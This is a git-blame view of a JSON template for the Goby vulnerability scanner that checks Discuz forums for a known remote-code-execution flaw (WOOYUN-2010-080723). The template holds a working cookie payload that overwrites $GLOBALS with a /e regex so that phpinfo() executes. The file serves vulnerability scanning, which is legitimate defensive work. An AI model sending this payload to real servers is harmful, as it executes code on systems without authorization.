qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Discuz_RCE_WOOYUN_2010_0807...

71 lines
2.7 KiB
JSON
Raw Normal View History

auto
2022-11-25 02:08:58 -08:00
{
"Name": "Discuz RCE WOOYUN-2010-080723",
"Level": "3",
"Tags": [
"rce"
],
auto
2022-12-01 10:14:36 -08:00
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP导致$_REQUEST中不再包含$_COOKIE我们通过在Cookie中传入$GLOBALS来覆盖全局变量造成代码执行漏洞。",
"Product": "discuz",
auto
2022-11-25 02:08:58 -08:00
"Homepage": "https://www.discuz.net/",
auto
2022-12-01 10:14:36 -08:00
"Author": "aetkrad",
"Impact": "",
auto
2022-11-25 02:08:58 -08:00
"Recommendation": "",
"References": [
"https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723"
],
auto
2022-12-01 10:14:36 -08:00
"HasExp": false,
auto
2022-11-25 02:08:58 -08:00
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/viewthread.php?tid=10",
"follow_redirect": false,
"header": {
"Cookie": "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=phpinfo();"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "PHP Version",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "System",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
auto
2022-12-01 10:14:36 -08:00
"PostTime": "2021-11-17 13:57:54",
"GobyVersion": "1.8.302"
auto
2022-11-25 02:08:58 -08:00
}